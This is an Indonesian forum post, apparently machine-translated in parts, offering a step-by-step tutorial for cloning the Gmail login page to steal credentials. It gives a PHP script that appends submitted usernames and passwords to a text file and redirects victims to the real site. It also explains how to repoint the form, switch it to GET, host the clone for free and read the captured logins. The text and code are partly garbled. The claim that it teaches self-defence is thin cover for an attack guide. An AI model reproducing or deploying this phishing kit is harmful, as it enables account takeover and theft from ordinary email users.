Phishing Tutorial

    misi ane numpang share cara phising yang biasa ane kerjain semoga bermanfaat buat semua,.....

    cuma ini yang ane bisa ,....
    ane share buat kita sama2 belajar abg2
    kasih cendol klo berguna ,..dan klo gak berguna di closed aja bang

    langsung saja kita ke TKP
    cekidot :

    Phishing Tutorial

    Phishing adalah proses mencuri informasi sensitif, seperti
    username, password, dan informasi bank, dengan berpura-pura menjadi seseorang
    Anda tidak. Contoh ini akan jika Anda menerima dan e-mail dari seorang hacker
    berpura-pura menjadi bank Anda. Dalam e-mail, ia dapat memberitahu Anda bahwa Anda perlu untuk
    memperbarui account Anda sebelum kadaluarsa, dan kemudian hacker menyediakan Icon_charly_link_green. Setelah
    Anda klik pada Icon_charly_link_green, Anda tiba di sebuah website yang terlihat persis seperti Anda yang sebenarnya
    bank halaman. Pada kenyataannya itu hanya replika yang sempurna, dan ketika anda masukan login
    rincian, itu mengirimnya ke email hacker atau toko di server web nya. Hacker yang
    menciptakan yang terbaik, paling menipu halaman web phishing yang berpengetahuan di
    daerah HTML dan pemrograman PHP. Di bawah ini saya akan menunjukkan contoh sederhana
    beberapa langkah-langkah hacker yang dibutuhkan untuk membuat situs web phishing. Dengan melihat
    langkah hacker akan ambil, akan membantu Anda mempertahankan diri dari serangan itu.

    1. Pertama hacker memilih target. Yang paling populer target phishing
    serangan layanan e-mail seperti Hotmail dan Gmail karena mereka
    yang paling umum dan sekali hacker mendapatkan akses ke e-mail Anda, dia juga
    mendapat akses ke memuat informasi pengguna lainnya untuk semua situs-situs lain
    Anda gunakan. Dalam contoh ini kita akan berpura-pura hacker memilih Gmail sebagai nya
    target.

    2. Setelah memilih targetnya, hacker akan pergi ke situs web dan menyimpan
    Seluruh halaman utama. Saya menggunakan Mozilla Firefox, (sangat merekomendasikan menggunakan
    browser untuk keamanan dan kustomisasi) Jadi saya akan pergi ke.
    http://www.gmail.com dan klik File -> halaman Simpan sebagai ..., atau cukup tekan <CTR> + S
    yang melakukan ini secara otomatis. Pilih mana Anda ingin menyimpan
    halaman web dan tekan Simpan.




    3. Setelah Anda memilikinya disimpan, mengubah nama ServiceLogin.htm untuk index.htm. The
    alasan Anda ingin nama "index" begitu ketika Anda meng-upload ke web
    host dan seseorang pergi ke Icon_charly_link_green, halaman indeks adalah halaman pertama yang
    muncul.

    4. Selanjutnya hacker akan membuat script PHP untuk melakukan perbuatan kotor nya
    menguatkan informasi Anda. Di bawah ini adalah script PHP sederhana yang log dan
    menyimpan informasi login Anda ketika Anda klik "Sign in". Untuk melihat cara kerjanya,
    copy dan paste kode berikut ke notepad. Selanjutnya simpan ke dalam
    direktori yang sama seperti Anda menyimpan halaman Gmail, dan nama itu phish.php. Dalam
    Selain ke halaman phish.php, membuat file teks baru kosong dan beri nama
    list.txt.

    PHP Code:
    <?php // This marks the beginning of the PHP script.
    PHP Code:
    Header(“Location:
    https://www.google.com/accounts/Serv...=mail&passive=
    true&rm=false&continue=http%3A%2F%2Fmail.google.co m%2Fmail%2F
    %3Fui%3Dhtml%26zy%3Dl&bsv=1k96igf4806cy&ltmpl=defa ult&ltmplcac
    he=2 “); // once you click “Sign in” in the fake website, this redirects
    you to the real Gmail website, making the whole process look more
    legit.
    PHP Code:
    $handle = fopen(“list.txt”, “a”); // this tells the server to open the file
    “list.txt” and get it ready for appending data. Which in this case is your
    username and password.
    PHP Code:
    Foreach($_GET as $variable => $value) {
        fwrite($handle, $variable);
        fwrite($handle, “=”);
        fwrite($handle, $value);
        fwrite($handle, “\r\n”);
        } // This section simply assigns all the information going through
        this form to a variable. This includes your username and password.
        Fwrite($handle, “\r\n”); // This writes your details to the file “list.txt”
        fclose($handle); // This simply closes the connection to the file
        “list.txt”
        exit;
    > /? / Marks akhir program PHP.

    Sejauh ini anda akan melihat berikut di folder anda:



    5. Sekarang hacker harus mengedit halaman Gmail utama untuk menyertakan nya
    PHP script. Untuk melihat apa yang akan dilakukan hacker, membuka Gmail utama
    halaman yang bernama index.htm dengan notepad.

    6. Tekan <CTR> + F, atau pergi ke Edit -> Find, ketik aksi dan tekan "Find Next".



    7. Ini akan menyorot terjadinya pertama dari "tindakan" kata di script
    dan Anda harus melihat:

    bentuk
    PHP Code:
    <id = "gaia_loginform" action = "https: / / www.google.com/accounts/Serv...?service=mail"
    Ada dua "tindakan" kejadian di script jadi pastikan Anda memiliki
    yang benar dengan melihat "bentuk id" nama di atas. Ubah Icon_charly_link_green yang
    antara action = "" untuk phish.php. Ini akan membuat bentuk tunduk kepada
    Anda phish script PHP, bukan ke Google. Setelah Icon_charly_link_green Anda akan melihat
    kode:

    metode = "post"

    Ubah kata "POST" untuk "GET" sehingga terlihat seperti metode = "GET".
    Apa yang dilakukan adalah metode GET menyampaikan informasi yang Anda ketik
    melalui URL sehingga script PHP dapat log itu.

    8. Simpan dan tutup file tersebut.

    9. Selanjutnya hacker akan meng-upload file hingga hosting yang gratis yang
    mendukung PHP. Dengan pencarian Google sederhana Anda bisa datang dengan
    banyak yang termasuk dalam kategori ini.

    10. Setelah semua file di-upload, Anda harus memberikan izin tertulis kepada
    "List.txt" file. Setiap perusahaan hosting harus memiliki pilihan CHMOD berikutnya
    ke setiap file. Pilih opsi ini dan mengubah izin file untuk
    "List.txt" ke 777. Jika Anda tidak bisa mengetahui bagaimana melakukan ini, mintalah orang-orang yang
    menggunakan host yang sama atau hanya sesuatu yang mirip dengan Google:
    "Yourwebhostname chmod".

    11. Setelah semuanya dan siap untuk pergi, pergi ke host anda disediakan Icon_charly_link_green
    Anda untuk website Anda dan Anda akan melihat replika halaman Gmail. Ketik
    username / password dan klik Daftar masuk ini seharusnya diarahkan Anda
    ke halaman Gmail nyata.
    12. Sekarang pergi melihat file list.txt Anda dengan pergi melalui file hosting Anda
    manajer atau akan
    http://www.yourwebhosturl.com/youraccount/list.txt. Meskipun ini
    yang paling umum web host yang anda gunakan dapat memberikan yang berbeda
    mencari URL. Sekarang jika saya menaruh nama pengguna dari "myusername" dan password
    dari "mypassword" kemudian "list.txt" sekarang akan tampak seperti berikut:

    PHP Code:
    ltmpl = default
    ltmplcache = 2
    terus = http://mail.google.com/mail/?
    service = mail
    rm-palsu
    Email = username
    Passwd = mypassword
    rmShown = 1
    signin = Masuk
    AST =
    Seperti yang Anda lihat jika Anda jatuh hacker ini akan memiliki email Anda dan
    sandi. Scary, eh? hehehehe

    semoga bermanfaat abg2 jika ada kekurangan mohon dimaklumin masih newbie